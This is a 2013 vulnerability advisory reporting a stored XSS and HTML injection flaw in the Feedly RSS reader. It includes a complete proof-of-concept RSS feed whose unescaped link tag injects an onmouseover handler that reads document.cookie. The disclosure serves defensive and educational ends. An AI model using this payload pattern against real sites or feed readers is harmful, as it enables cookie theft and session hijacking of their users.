* Feedly.com HTML Injection and XSS Vulnerability RSS feed * ======================================================== * * Site: http://feedly.com * Discovered by: Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==) * Follow me: http://www.linkedin.com/in/andreamenin * * ======================================================== Report-Timeline: ---------------- 2013-07-02: Reported to domain's tech contact Introduction: ------------- Feedly.com is an RSS feed reader, once you sign up (local account or google auth) you can add, also by typing URL, RSS Feeds from your preferred web sites. Description: ------------ I found this XSS Vulnerability and HTML Injection by adding a fake RSS, with a JavaScript "injection" inside the tag <link>. I've see that Feedly.com doesen't escape/sanitize the "quotes" inside this tag... so, i've put something like this: <link>http://www.bla.l33t/" onmouseover="alert(document.cookie)">bla</a></link> Full RSS "Exploit" with injection on tag <link>: ------------------------------------------------ <?xml version="1.0" encoding="utf-8"?> <rss version="2.0"> <channel> <item> <title>Test XSS Vulnerability</title> <link>http://www.bla.l33t/" onmouseover="alert(document.cookie)">bla</a></link> <pubDate>Sun, 2 Jul 2013 22:56:41 GMT</pubDate> <description>XSS TEST, yuk!</description> </item> </channel> </rss> Screenshot XSS Vulnerability: ----------------------------- http://goo.gl/fs2Vg CREDITS: --------- This vulnerabilities has been discovered by Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==) LEGAL NOTICES: --------------- The Author accepts no responsibility for any damage caused by the use or misuse of this information.